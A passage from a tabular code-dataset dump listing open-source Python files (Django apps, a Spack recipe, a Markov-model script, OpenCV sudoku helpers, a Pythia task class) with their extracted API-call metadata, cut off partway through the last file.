repo_name (string, 7-94 chars) | repo_path (string, 4-237 chars) | repo_head_hexsha (string, 40 chars) | content (string, 10-680k chars) | apis (string, 2-840k chars)
---|---|---|---|---|
hoover/hoover | hoover/site/wsgi.py | 84053b2479e966b0f639692c9e226261e3188709 | from . import events # noqa
from django.core.wsgi import get_wsgi_application
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "hoover.site.settings")
application = get_wsgi_application()
| [((4, 0, 4, 71), 'os.environ.setdefault', 'os.environ.setdefault', ({(4, 22, 4, 46): '"""DJANGO_SETTINGS_MODULE"""', (4, 48, 4, 70): '"""hoover.site.settings"""'}, {}), "('DJANGO_SETTINGS_MODULE', 'hoover.site.settings')", False, 'import os\n'), ((7, 14, 7, 36), 'django.core.wsgi.get_wsgi_application', 'get_wsgi_application', ({}, {}), '()', False, 'from django.core.wsgi import get_wsgi_application\n')] |
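Each `apis` cell is a Python-literal list with one tuple per extracted call. Judging from the rows on this page, the fields appear to be: the call's source span `(start_line, start_col, end_line, end_col)`, the fully qualified API name, the name as written at the call site, a pair of dicts mapping argument spans to positional and keyword argument text, a repr of the argument list, a boolean flag (False in every row shown here), and the import statement that introduced the name. A minimal sketch of decoding one entry with the standard library follows; the field interpretation is inferred from these rows, not taken from a published schema.

```python
import ast

# One entry copied from the `apis` cell of the hoover/site/wsgi.py row above.
apis_cell = ("[((7, 14, 7, 36), 'django.core.wsgi.get_wsgi_application', "
             "'get_wsgi_application', ({}, {}), '()', False, "
             "'from django.core.wsgi import get_wsgi_application\\n')]")

for span, qualified_name, call_name, arg_maps, args_repr, flag, import_stmt in ast.literal_eval(apis_cell):
    start_line, start_col, end_line, end_col = span
    print(f"{qualified_name} called at line {start_line}, columns {start_col}-{end_col}")
    print(f"  argument text: {args_repr}")
    print(f"  imported via:  {import_stmt.strip()}")
```

The spans refer to line and column positions in the original file, so they line up with the `content` column only as long as the stored file text is kept verbatim.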
pbasting/cactus | submodules/hal/analysis/constraintTurnover/turnoverModel.py | 833d8ca015deecdfa5d0aca01211632cdaca9e58 | #!/usr/bin/env python
#Copyright (C) 2013 by Glenn Hickey
#
#Released under the MIT license, see LICENSE.txt
#!/usr/bin/env python
"""This is a two-state continuous time markov model: 0: unconstratined. 1: constrained. There are two transition rates to go between states. lossRate: 1->0 and gainRate: 0->1. Probability Matrix and Stationary Distribution are computed from the two rates and a time t. (see pdf)
"""
import argparse
import os
import sys
import copy
import random
import math
from collections import defaultdict
import numpy as np
import subprocess
import tempfile
#constrained is always 1. unconstrained is always 0
# compute probability matrix from rates and time.
def computePMatrix(lossRate, gainRate, t):
assert t >= 0
assert lossRate >= 0
assert gainRate >= 0
x = gainRate / lossRate
y = gainRate + lossRate
eyt = math.exp(-y * t)
c = 1.0 / (x + 1.0)
P = [ [c * (1.0 + x * eyt), c * (x - x * eyt)],
[c * (1.0 - eyt), c * (x + eyt)] ]
assert math.fabs(P[0][0] + P[0][1] - 1.0) < 0.00001
assert math.fabs(P[1][0] + P[1][1] - 1.0) < 0.00001
return P
# compute stationary distribution from rates and time
def computeStationaryDist(lossRate, gainRate, t):
assert t >= 0
assert lossRate >= 0
assert gainRate >= 0
x = gainRate / lossRate
y = gainRate + lossRate
eyt = math.exp(-y * t)
pi0 = (eyt - 1.0) / ( x * eyt + eyt - x - 1.0)
pi1 = 1. - pi0
# assert pi0 * ( ((1.0 + x * eyt) / (x + 1.0)) -1.0) + (1.0 - pi0) * ((1.0 - eyt) / (x + 1.0)) == 0
assert pi0 >= 0 and pi0 <= 1.0
assert pi1 >= 0 and pi1 <= 1.0
return [pi0, pi1]
# compute the absolute difference between the values of the
# probability matrix and stationary distribution computed from a given
# rate, and a set of absolute values of the same. This is a sum of four
# differences, 2 for the distribution, 4 for the matrix.
def diffOnePoint(lossRate, gainRate, piEst, Pest, t):
P = computePMatrix(lossRate, gainRate, t)
pi = computeStationaryDist(lossRate, gainRate, t)
d = math.fabs(pi[0] - piEst[0])
d += math.fabs(pi[1] - piEst[1])
d += math.fabs(P[0][0] - Pest[0][0])
d += math.fabs(P[0][1] - Pest[0][1])
d += math.fabs(P[1][0] - Pest[1][0])
d += math.fabs(P[1][1] - Pest[1][1])
return d
# compute the sum of squared differences for a pair of rate parameters
# and a set of data points. Each data point is a 3 tuple:
# (1x2 stationary distribution pi, 2x2 probability matrix P, time t)
def diffSqManyPoints(lossRate, gainRate, estVals):
dtot = 0
for estVal in estVals:
piEst = estVal[0]
Pest = estVal[1]
t = estVal[2]
d = diffOnePoint(lossRate, gainRate, piEst, Pest, t)
dtot += d * d
return dtot
# use really simple gradient descent type approach to find rate values that
# minimize the squared difference with some data points. Each data point
# is a 3-tuple as described above. The gradient descent iteratres over
# maxIt iterations. Each iteration it tries to add and subtract delta from
# the current best rates (4 combinations: add delta to gain, add delta to loss,
# subtract delta from gain, subtract delta from loss). The best pair
# of rate parameters are returned, along with their square difference from
# the data.
def gradDescent(lrStart, grStart, estVals, maxIt, delta):
bestDiff = diffSqManyPoints(lrStart, grStart, estVals)
bestLr = lrStart
bestGr = grStart
lastChangeIterator = 0
for i in range(maxIt):
lr = bestLr
gr = bestGr
dpl = diffSqManyPoints(lr + delta, gr, estVals)
rval = random.randint(0, 3)
if rval == 0 and dpl < bestDiff:
bestDiff = dpl
bestLr = lr + delta
bestGr = gr
lastChangeIterator = i
dpg = diffSqManyPoints(lr, gr + delta, estVals)
if rval == 1 and dpg < bestDiff:
bestDiff = dpg
bestLr = lr
bestGr = gr + delta
lastChangeIterator = i
if rval == 2 and lr > delta:
dml = diffSqManyPoints(lr - delta, gr, estVals)
if dml < bestDiff:
bestDiff = dml
bestLr = lr - delta
bestGr = gr
lastChangeIterator = i
if rval == 3 and gr > delta:
dmg = diffSqManyPoints(lr, gr - delta, estVals)
if dmg < bestDiff:
bestDiff = dmg
bestLr = lr
bestGr = gr - delta
lastChangeIterator = i
#
# Hack: if nothing happened, instead of returning, try adding
# 10x the step value and seeing what happens.
#
if i == lastChangeIterator + 8:
boostDelta = delta * 10.
dpl = diffSqManyPoints(lr + boostDelta, gr, estVals)
if rval == 0 and dpl < bestDiff:
bestDiff = dpl
bestLr = lr + boostDelta
bestGr = gr
lastChangeIterator = i
dpg = diffSqManyPoints(lr, gr + boostDelta, estVals)
if rval == 1 and dpg < bestDiff:
bestDiff = dpg
bestLr = lr
bestGr = gr + boostDelta
lastChangeIterator = i
if rval == 2 and lr > boostDelta:
dml = diffSqManyPoints(lr - boostDelta, gr, estVals)
if dml < bestDiff:
bestDiff = dml
bestLr = lr - boostDelta
bestGr = gr
lastChangeIterator = i
if rval == 3 and gr > boostDelta:
dmg = diffSqManyPoints(lr, gr - boostDelta, estVals)
if dmg < bestDiff:
bestDiff = dmg
bestLr = lr
bestGr = gr - boostDelta
lastChangeIterator = i
# we tried the 10x and now give up
elif i > lastChangeIterator + 8:
break
return (bestLr, bestGr, bestDiff)
# add some noise to parameters
def addNoise(P, pi, maxNoise):
d = random.uniform(-maxNoise, maxNoise)
P[0][0] += d
P[0][1] -= d
d = random.uniform(-maxNoise, maxNoise)
P[1][0] += d
P[1][1] -= d
d = random.uniform(-maxNoise, maxNoise)
pi[0] += d
pi[1] -= d
# generate some random "estimated" parameters for values of t
# within a given range. random noise is added as specifed by maxNoise
def generateData(n, tRange, lossRate, gainRate, maxNoise):
genVals = []
for i in range(n):
t = random.uniform(tRange[0], tRange[1])
P = computePMatrix(lossRate, gainRate, t)
pi = computeStationaryDist(lossRate, gainRate, t)
addNoise(P, pi, maxNoise)
genVals.append((pi, P, t))
return genVals
def main(argv=None):
if argv is None:
argv = sys.argv
parser = argparse.ArgumentParser()
parser.add_argument("N", type=int,
help="number of simulated data sets")
parser.add_argument("size", type=int,
help="number of simulated data points per set")
parser.add_argument("minRate", type=float,
help="minimum true rate")
parser.add_argument("maxRate", type=float,
help="maximum true rate")
parser.add_argument("minT", type=float,
help="minimum true t")
parser.add_argument("maxT", type=float,
help="maximum true t")
parser.add_argument("--maxIt", type=int, default=1000,
help="number of iterations for gradient descent")
parser.add_argument("--step", type=float, default=0.001,
help="gradient descent step")
parser.add_argument("--noise", type=float, default=0,
help="max amount of noise to add")
parser.add_argument("--retries", type=int, default=5,
help="number of gradient descents to run")
args = parser.parse_args()
assert (args.N > 0 and args.size > 0 and args.minRate > 0 and
args.maxRate > 0 and args.minT > 0 and args.maxT > 0 and
args.maxIt > 0 and args.step > 0 and args.noise >= 0 and
args.retries > 1)
for n in range(args.N):
lrTrue = random.uniform(args.minRate, args.maxRate)
grTrue = random.uniform(args.minRate, args.maxRate)
genVals = generateData(args.size, (args.minT, args.maxT),
lrTrue, grTrue, args.noise)
bestLr, bestGr, bestDiff = (0, 0, 1000000)
for retry in range(args.retries):
lrStart = random.uniform(0.0001, 1.0)
grStart = random.uniform(0.0001, 1.0)
(lrEst, grEst, diff) = gradDescent(lrStart, grStart, genVals,
args.maxIt, args.step)
if diff < bestDiff:
bestLr, bestGr, bestDiff = (lrEst, grEst, diff)
print "Truth=(%f,%f), Start=(%f,%f) Est=(%f,%f), dsq=%f" % (
lrTrue, grTrue, lrStart, grStart, bestLr, bestGr,
(lrTrue - bestLr) * (lrTrue - bestLr) +
(grTrue - bestGr) * (grTrue - bestGr))
print "--------------------------------"
if __name__ == "__main__":
sys.exit(main())
| [] |
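For reference, the quantities computed by `computePMatrix` and `computeStationaryDist` in the turnoverModel.py row above (the "(see pdf)" mentioned in its docstring is not part of this dump) are the standard two-state CTMC closed forms. Writing g for gainRate, l for lossRate, x = g/l and y = g + l, with state 0 = unconstrained and state 1 = constrained:

```latex
P(t) = \frac{1}{x+1}
\begin{pmatrix}
1 + x e^{-yt} & x - x e^{-yt} \\
1 - e^{-yt}   & x + e^{-yt}
\end{pmatrix},
\qquad
\pi = \left(\frac{1}{x+1},\ \frac{x}{x+1}\right)
    = \left(\frac{l}{g+l},\ \frac{g}{g+l}\right)
```

Each row of P(t) sums to 1, which is exactly what the asserts in `computePMatrix` check, and the expression coded in `computeStationaryDist` simplifies to this t-independent π because its denominator factors as (x+1)(e^{-yt} - 1).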
speratus/SimpleBudget | SimpleBudget/SimpleBudget/budgets/tests.py | d4903db8693694572c4bcb367fe4a318a3867d68 | from django.test import TestCase
from .validators import validate_budget_period
from .models import Budget, Expense, Payment
from django.contrib.auth.models import User
from django.core.exceptions import ValidationError
class ExpenseTestCases(TestCase):
def setUp(self) -> None:
user = User.objects.create_user('joe', email='[email protected]', password='imlame')
budget = Budget.objects.create(name='My budget',
creation_date='2019-05-03',
owner=user,
description='The budget of champions.'
)
Expense.objects.create(name='Water park visit',
amount=30.00,
period='1-monthly',
payee='Super awesome Water parks',
description='I will go to the water park.',
date='2019-06-04',
budget=budget
)
Payment.objects.create(name='Paycheck',
amount=4000.0,
period='1-monthly',
description='Where the Mullah comes from',
date='2017-01-12',
origin='The big boss fom up top in HR.',
budget=budget
)
def test_proper_str_formation(self):
budget = Budget.objects.get(pk=1)
expense = Expense.objects.get(pk=1)
payment = Payment.objects.get(pk=1)
self.assertEquals(budget.__str__(), 'My budget: joe', 'The budget was not created properly.')
self.assertEquals(expense.__str__(), 'Water park visit: 30.0', 'The expense was not create properly.')
self.assertEquals(payment.__str__(), 'Paycheck: 4000.0', 'The string function on payment is not workng properly.')
class BudgetPeriodValidatorTestCase(TestCase):
valid_cases = [
'1-daily',
'1-onetime',
'1-annually',
'5-quarterly',
'7-weekly',
'3-annually',
'10-monthly',
'19-weekly',
'99-daily'
]
invalid_cases = [
'0.4-daily',
'0-weekly',
'ad-annually',
'100-weekly',
'4.6-quarterly',
'-31-daily',
'whoot-quarterly',
'59-zoobly',
'5-onetime',
'03-monthly',
]
def test_budget_period_validator(self):
for c in self.valid_cases:
self.assertEquals(validate_budget_period(c), None, f'failed on {c}')
def test_budget_period_validator_fail(self):
for c in self.invalid_cases:
self.assertRaises(ValidationError, validate_budget_period, c)
def test_validator_in_expense_model_creation_invalid(self):
user = User.objects.create(username='joe', email='[email protected]', password='imlame')
budget = Budget.objects.create(name='My Budget',
creation_date='2019-04-13',
owner=user,
)
for c in self.invalid_cases:
self.assertRaises(Exception, Expense.objects.create,
name=c + '1',
amount=15.0,
date='2014-05-06',
period=c,
budget=budget
)
| [((11, 15, 11, 95), 'django.contrib.auth.models.User.objects.create_user', 'User.objects.create_user', (), '', False, 'from django.contrib.auth.models import User\n'), ((78, 15, 78, 97), 'django.contrib.auth.models.User.objects.create', 'User.objects.create', (), '', False, 'from django.contrib.auth.models import User\n')] |
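The two case lists in `BudgetPeriodValidatorTestCase` above pin down the accepted format fairly tightly: a count from 1 to 99 with no leading zero, a hyphen, one of the known period words, and `onetime` apparently only with a count of 1. A regular-expression check consistent with those cases might look like the sketch below; it is inferred from the test data and is not the project's actual `validate_budget_period`.

```python
import re

# Inferred from the valid/invalid cases listed in the tests above; NOT the real validator.
PERIOD_RE = re.compile(r"^(?:1-onetime|[1-9]\d?-(?:daily|weekly|monthly|quarterly|annually))$")

def looks_like_valid_period(value: str) -> bool:
    return bool(PERIOD_RE.match(value))

assert looks_like_valid_period("99-daily")
assert looks_like_valid_period("1-onetime")
assert not looks_like_valid_period("100-weekly")
assert not looks_like_valid_period("03-monthly")
assert not looks_like_valid_period("5-onetime")
```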
kubapi/hater | feed/migrations/0002_remove_player_finished_decks.py | fe4ef653e169143b9ea8cc17494e8e35b2a7bc76 | # Generated by Django 3.2.3 on 2021-06-13 19:58
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('feed', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='player',
name='finished_decks',
),
]
| [((13, 8, 16, 9), 'django.db.migrations.RemoveField', 'migrations.RemoveField', (), '', False, 'from django.db import migrations\n')] |
jeanbez/spack | var/spack/repos/builtin/packages/abacus/package.py | f4e51ce8f366c85bf5aa0eafe078677b42dae1ba | # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import re
from spack.package import *
class Abacus(MakefilePackage):
"""ABACUS (Atomic-orbital Based Ab-initio Computation at UStc)
is an open-source computer code package aiming
for large-scale electronic-structure simulations
from first principles"""
maintainers = ["bitllion"]
homepage = "http://abacus.ustc.edu.cn/"
git = "https://github.com/abacusmodeling/abacus-develop.git"
url = "https://github.com/abacusmodeling/abacus-develop/archive/refs/tags/v2.2.1.tar.gz"
version("develop", branch="develop")
version(
"2.2.3",
sha256="88dbf6a3bdd907df3e097637ec8e51fde13e2f5e0b44f3667443195481320edf",
)
version(
"2.2.2",
sha256="4a7cf2ec6e43dd5c53d5f877a941367074f4714d93c1977a719782957916169e",
)
version(
"2.2.1",
sha256="14feca1d8d1ce025d3f263b85ebfbebc1a1efff704b6490e95b07603c55c1d63",
)
version(
"2.2.0",
sha256="09d4a2508d903121d29813a85791eeb3a905acbe1c5664b8a88903f8eda64b8f",
)
variant("openmp", default=True, description="Enable OpenMP support")
depends_on("elpa+openmp", when="+openmp")
depends_on("elpa~openmp", when="~openmp")
depends_on("cereal")
depends_on("libxc")
depends_on("fftw")
# MPI is a necessary dependency
depends_on("mpi", type=("build", "link", "run"))
depends_on("mkl")
build_directory = "source"
def edit(self, spec, prefix):
if "+openmp" in spec:
inc_var = "_openmp-"
system_var = (
"ELPA_LIB = -L${ELPA_LIB_DIR} -lelpa_openmp -Wl, -rpath=${ELPA_LIB_DIR}"
)
else:
inc_var = "-"
system_var = (
"ELPA_LIB = -L${ELPA_LIB_DIR} -lelpa -Wl,-rpath=${ELPA_LIB_DIR}"
)
tempInc = (
"\
FORTRAN = ifort\n\
CPLUSPLUS = icpc\n\
CPLUSPLUS_MPI = mpiicpc\n\
LAPACK_DIR = $(MKLROOT)\n\
FFTW_DIR = %s\n\
ELPA_DIR = %s\n\
ELPA_INCLUDE = -I${ELPA_DIR}/include/elpa%s%s\n\
CEREAL_DIR = %s\n\
OBJ_DIR = obj\n\
OBJ_DIR_serial = obj\n\
NP = 14\n"
% (
spec["fftw"].prefix,
spec["elpa"].prefix,
inc_var,
"{0}".format(spec["elpa"].version),
spec["cereal"].prefix,
)
)
with open(self.build_directory + "/Makefile.vars", "w") as f:
f.write(tempInc)
lineList = []
Pattern1 = re.compile("^ELPA_INCLUDE_DIR")
Pattern2 = re.compile("^ELPA_LIB\\s*= ")
with open(self.build_directory + "/Makefile.system", "r") as f:
while True:
line = f.readline()
if not line:
break
elif Pattern1.search(line):
pass
elif Pattern2.search(line):
pass
else:
lineList.append(line)
with open(self.build_directory + "/Makefile.system", "w") as f:
for i in lineList:
f.write(i)
with open(self.build_directory + "/Makefile.system", "a") as f:
f.write(system_var)
def install(self, spec, prefix):
install_tree("bin", prefix.bin)
| [((94, 19, 94, 50), 're.compile', 're.compile', ({(94, 30, 94, 49): '"""^ELPA_INCLUDE_DIR"""'}, {}), "('^ELPA_INCLUDE_DIR')", False, 'import re\n'), ((95, 19, 95, 48), 're.compile', 're.compile', ({(95, 30, 95, 47): '"""^ELPA_LIB\\\\s*= """'}, {}), "('^ELPA_LIB\\\\s*= ')", False, 'import re\n')] |
ppelleti/berp | test/regression/features/arithmetic/mult.py | 30925288376a6464695341445688be64ac6b2600 | print(18 * 1234)
print(18 * 1234 * 2)
print(0 * 1)
print(1 * 0)
print(0.0 * 1.0)
print(1.0 * 0.0)
| [] |
SafonovMikhail/python_000577 | 001146StepikPyBegin/Stepik001146PyBeginсh02p05st15C09_20200411.py | 739f764e80f1ca354386f00b8e9db1df8c96531d | num = int(input())
d1 = (num % 10 ** 4) // 10 ** 3
d2 = (num % 10 ** 3) // 10 ** 2
d3 = (num % 10 ** 2) // 10
d4 = num % 10
print("Цифра в позиции тысяч равна", d1)
print("Цифра в позиции сотен равна", d2)
print("Цифра в позиции десятков равна", d3)
print("Цифра в позиции единиц равна", d4)
# print("Python", , "is the best")
_quit = 1
print(_quit * 2)
| [] |
on-merrit/ON-MERRIT | WP3/Task3.2/spark/shared/addcountry2dataset.py | a21324a54a6365f2f769b5952b0cf5347a97d480 | import csv
from os import listdir
from os.path import isfile, join
from osgeo import ogr
from multiprocessing import Pool
driver = ogr.GetDriverByName('GeoJSON')
countryFile = driver.Open("../data/external/countries.json")
layer = countryFile.GetLayer()
class Point(object):
""" Wrapper for ogr point """
def __init__(self, lat, lng):
""" Coordinates are in degrees """
self.point = ogr.Geometry(ogr.wkbPoint)
self.point.AddPoint(lng, lat)
def getOgr(self):
return self.point
ogr = property(getOgr)
class Country(object):
""" Wrapper for ogr country shape. Not meant to be instantiated directly. """
def __init__(self, shape):
self.shape = shape
def getIso(self):
return self.shape.GetField('ISO_A3')
iso = property(getIso)
def __str__(self):
return self.shape.GetField('ADMIN')
def contains(self, point):
return self.shape.geometry().Contains(point.ogr)
def getCountry(lat, lng):
"""
Checks given gps-incoming coordinates for country.
Output is either country shape index or None
"""
point = ogr.Geometry(ogr.wkbPoint)
point.AddPoint(lng, lat)
for i in range(layer.GetFeatureCount()):
country = layer.GetFeature(i)
if country.geometry().Contains(point):
return Country(country).iso
# nothing found
return None
def process_chunk(file):
with open(file, 'r') as read_obj, open(f"{file}_done.csv", 'w') as write_obj:
# pass the file object to reader() to get the reader object
csv_reader = csv.reader(read_obj)
csv_writer = csv.writer(write_obj)
# Iterate over each row in the csv using reader object
count=0
for row in csv_reader:
# row variable is a list that represents a row in csv
if row[2] and row[3]:
country = getCountry(float(row[2]), float(row[3]))
row.append(country)
csv_writer.writerow(row)
count+=1
if count%100==0:
print(f"File {file} progress: {count}/100000")
print(f"Processing {file} terminated")
allfiles = [join("q1a_latlon_split", f) for f in listdir("q1a_latlon_split") if isfile(join("q1a_latlon_split", f))]
with Pool(32) as p:
p.map(process_chunk, allfiles)
| [((82, 12, 82, 39), 'os.path.join', 'join', ({(82, 17, 82, 35): '"""q1a_latlon_split"""', (82, 37, 82, 38): 'f'}, {}), "('q1a_latlon_split', f)", False, 'from os.path import isfile, join\n'), ((84, 5, 84, 13), 'multiprocessing.Pool', 'Pool', ({(84, 10, 84, 12): '(32)'}, {}), '(32)', False, 'from multiprocessing import Pool\n'), ((65, 21, 65, 41), 'csv.reader', 'csv.reader', ({(65, 32, 65, 40): 'read_obj'}, {}), '(read_obj)', False, 'import csv\n'), ((66, 21, 66, 42), 'csv.writer', 'csv.writer', ({(66, 32, 66, 41): 'write_obj'}, {}), '(write_obj)', False, 'import csv\n'), ((82, 49, 82, 76), 'os.listdir', 'listdir', ({(82, 57, 82, 75): '"""q1a_latlon_split"""'}, {}), "('q1a_latlon_split')", False, 'from os import listdir\n'), ((82, 87, 82, 114), 'os.path.join', 'join', ({(82, 92, 82, 110): '"""q1a_latlon_split"""', (82, 112, 82, 113): 'f'}, {}), "('q1a_latlon_split', f)", False, 'from os.path import isfile, join\n')] |
Henchel-Santillan/open-ai | ai-experiments/sudoku/rdisplay.py | 545bf8468330dce7e705c17e0ac4ce3889f20d5b | import cv2
import numpy as np
def process_core(image):
'''
Returns an inverted preprocessed binary image, with noise
reduction achieved with greyscaling, Gaussian Blur, Otsu's Threshold, and
an open morph.
'''
#apply greyscaling, Gaussian Blur, and Otsu's Threshold
greyscale = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
blur = cv2.GaussianBlur(greyscale, (3, 3), 0)
threshold = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)[1]
#apply an open morph to invert image to remove noise
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (3, 3))
invert = 255 - cv2.morphologyEx(threshold, cv2.MORPH_OPEN, kernel, iterations=1)
return invert
def find_houghlines(image, width, height):
hough_lines = None
lines = cv2.HoughLinesP(image, 1, np.pi/180, 50, minLineLength=50, maxLineGap=5)
#generates blank black image with single color layer
if lines is not None and len(lines) != 0:
hough_lines = np.zeros((height, width), dtype=np.uint8)
for line in lines:
x1, y1, x2, y2 = line[0]
cv2.line(hough_lines, (x1, y1), (x2, y2), (255, 255, 255), 2)
return hough_lines
def find_bounds(image):
rect_bounds = None
#Run contour recognition
contours, _ = cv2.findContours(image, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
#Take list of sorted contours by largest area to smallest area
#If at least one contour is identified, can process visual approx. of contour bounds
if len(sorted(contours, key=cv2.contourArea, reverse=True)) > 0:
contour_bounds = None
#Pre-determined image size factor constant
SFACTOR = 20
for contour in contours:
#Minimum intended size of a single cell is not reached, likely a cutoff, not worth approx.
if (image[0] * image[1]) / SFACTOR > cv2.contourArea(contour):
break
approximation = cv2.approxPolyDP(contour, cv2.arcLength(contour, True), True)
#This means that the approximated polygon is a quad
if len(approximation) == 4:
contour_bounds = approximation
break
if contour_bounds is not None:
rect_bounds = np.zeros((4, 2), dtype=np.float32)
corners = contour_bounds.reshape(-1, 2)
rect_bounds[0] = corners[np.argmin(contour_bounds.sum(axis=1))]
rect_bounds[2] = corners[np.argmax(contour_bounds.sum(axis=1))]
rect_bounds[1] = corners[np.argmin(np.diff(corners, axis=1))]
rect_bounds[3] = corners[np.argmax(np.diff(corners, axis=1))]
return rect_bounds
#Transform the perspective to render as if looking down on paper (top-down view)
def transform(image, perspective):
pass
#Process the grid based on expected clean binary image input
def process_grid(image, width, height):
grid = None
detected = False
hough_lines = find_houghlines(image, width, height)
| [((11, 16, 11, 55), 'cv2.cvtColor', 'cv2.cvtColor', ({(11, 29, 11, 34): 'image', (11, 36, 11, 54): 'cv2.COLOR_BGR2GRAY'}, {}), '(image, cv2.COLOR_BGR2GRAY)', False, 'import cv2\n'), ((12, 11, 12, 49), 'cv2.GaussianBlur', 'cv2.GaussianBlur', ({(12, 28, 12, 37): 'greyscale', (12, 39, 12, 45): '(3, 3)', (12, 47, 12, 48): '0'}, {}), '(greyscale, (3, 3), 0)', False, 'import cv2\n'), ((16, 13, 16, 62), 'cv2.getStructuringElement', 'cv2.getStructuringElement', ({(16, 39, 16, 53): 'cv2.MORPH_RECT', (16, 55, 16, 61): '(3, 3)'}, {}), '(cv2.MORPH_RECT, (3, 3))', False, 'import cv2\n'), ((24, 12, 24, 84), 'cv2.HoughLinesP', 'cv2.HoughLinesP', (), '', False, 'import cv2\n'), ((40, 18, 40, 85), 'cv2.findContours', 'cv2.findContours', ({(40, 35, 40, 40): 'image', (40, 42, 40, 59): 'cv2.RETR_EXTERNAL', (40, 61, 40, 84): 'cv2.CHAIN_APPROX_SIMPLE'}, {}), '(image, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)', False, 'import cv2\n'), ((13, 16, 13, 84), 'cv2.threshold', 'cv2.threshold', ({(13, 30, 13, 34): 'blur', (13, 36, 13, 37): '(0)', (13, 39, 13, 42): '(255)', (13, 44, 13, 83): '(cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)'}, {}), '(blur, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)', False, 'import cv2\n'), ((17, 19, 17, 84), 'cv2.morphologyEx', 'cv2.morphologyEx', (), '', False, 'import cv2\n'), ((28, 22, 28, 63), 'numpy.zeros', 'np.zeros', (), '', True, 'import numpy as np\n'), ((32, 12, 32, 73), 'cv2.line', 'cv2.line', ({(32, 21, 32, 32): 'hough_lines', (32, 34, 32, 42): '(x1, y1)', (32, 44, 32, 52): '(x2, y2)', (32, 54, 32, 69): '(255, 255, 255)', (32, 71, 32, 72): '(2)'}, {}), '(hough_lines, (x1, y1), (x2, y2), (255, 255, 255), 2)', False, 'import cv2\n'), ((62, 26, 62, 60), 'numpy.zeros', 'np.zeros', (), '', True, 'import numpy as np\n'), ((51, 49, 51, 73), 'cv2.contourArea', 'cv2.contourArea', ({(51, 65, 51, 72): 'contour'}, {}), '(contour)', False, 'import cv2\n'), ((54, 54, 54, 82), 'cv2.arcLength', 'cv2.arcLength', ({(54, 68, 54, 75): 'contour', (54, 77, 54, 81): 'True'}, {}), '(contour, True)', False, 'import cv2\n'), ((68, 47, 68, 71), 'numpy.diff', 'np.diff', (), '', True, 'import numpy as np\n'), ((69, 47, 69, 71), 'numpy.diff', 'np.diff', (), '', True, 'import numpy as np\n')] |
abhiskk/pythia | pythia/tasks/base_task.py | c33fb45d74353c25b6269b44551bcafefecb5c7e | # Copyright (c) Facebook, Inc. and its affiliates.
"""
Tasks come above datasets in hierarchy level. In case you want to
implement a new task, you need to inherit ``BaseTask`` class. You need
to implement ``_get_available_datasets`` and ``_preprocess_item`` functions
to complete the implementation. You can check the source to see if you need
to override any other methods like ``prepare_batch``.
Check example of ``VQATask`` here_.
Example::
from pythia.tasks.base_task import BaseTask
from pythia.common.registry import registry
@registry.register_task("my")
class MyTask(BaseTask):
def __init__(self):
super().__init__("my")
def _get_available_datasets(self):
return ["my"]
def _preprocess_item(self):
item.text = None
return item
.. _here: https://github.com/facebookresearch/pythia/blob/v0.3/pythia/tasks/vqa/vqa_task.py
"""
import sys
import numpy as np
from torch.utils.data import Dataset
from pythia.common.registry import registry
class BaseTask(Dataset):
"""
BaseTask that task classes need to inherit in order to create a new task.
Users must implement ``_get_available_datasets`` and ``_preprocess_item``
in order to complete implementation.
Args:
task_name (str): Name of the task with which it will be registered
"""
def __init__(self, task_name):
super(BaseTask, self).__init__()
self.task_name = task_name
self.writer = registry.get("writer")
def _process_datasets(self):
if "datasets" not in self.opts:
self.writer.write(
"No datasets attribute present for task: %s."
" Defaulting to all" % (self.task_name),
"warning",
)
datasets = "all"
else:
datasets = self.opts["datasets"]
if datasets is None or datasets == "all":
datasets = self._get_available_datasets()
if type(datasets) == str:
datasets = list(map(lambda x: x.strip(), datasets.split(",")))
if len(datasets) == 0 and datasets[0] == "all":
datasets = self._get_available_datasets()
self.given_datasets = datasets
def load(self, **opts):
self.opts = opts
self._process_datasets()
self.datasets = []
self.builders = []
available_datasets = self._get_available_datasets()
self.total_length = 0
self.per_dataset_lengths = []
self.num_datasets = 0
for dataset in self.given_datasets:
if dataset in available_datasets:
builder_class = registry.get_builder_class(dataset)
if builder_class is None:
print("No builder class found for %s." % dataset)
continue
builder_instance = builder_class()
if dataset in self.opts["dataset_attributes"]:
attributes = self.opts["dataset_attributes"][dataset]
else:
self.writer.write(
"Dataset %s is missing from "
"dataset_attributes in config." % dataset,
"error",
)
sys.exit(1)
dataset_type = self.opts.get("dataset_type", "train")
builder_instance.build(dataset_type, attributes)
dataset_instance = builder_instance.load(dataset_type, attributes)
self.builders.append(builder_instance)
self.datasets.append(dataset_instance)
self.per_dataset_lengths.append(len(dataset_instance))
self.total_length += len(dataset_instance)
else:
print(
"Dataset %s is not a valid dataset for task %s. Skipping"
% (dataset, self.task_name)
)
self.num_datasets = len(self.datasets)
self.dataset_probablities = [1 for _ in range(self.num_datasets)]
sampling = self.opts.get("dataset_size_proportional_sampling", None)
if sampling is True:
self.dataset_probablities = self.per_dataset_lengths[:]
self.dataset_probablities = [
prob / self.total_length for prob in self.dataset_probablities
]
self.change_dataset()
def _get_available_datasets(self):
"""Set available datasets for this task here.
Override in your child task class
Temporary solution, later we will use decorators to easily register
datasets with a task
Returns:
List - List of available datasets for this particular task
"""
return []
def get_datasets(self):
return self.datasets
def __len__(self):
return self.total_length
def __getitem__(self, idx):
idx = idx % self.per_dataset_lengths[self.dataset_choice]
item = self.chosen_dataset[idx]
return self._preprocess_item(item)
def change_dataset(self):
self.dataset_choice = np.random.choice(
self.num_datasets, 1, p=self.dataset_probablities
)[0]
self.chosen_dataset = self.datasets[self.dataset_choice]
def verbose_dump(self, *args, **kwargs):
self.chosen_dataset.verbose_dump(*args, **kwargs)
def prepare_batch(self, batch):
return self.chosen_dataset.prepare_batch(batch)
def _preprocess_item(self, item):
"""Preprocess an item to be returned from __getitem__.
Override in your child task class, so you have control on what you are
returning
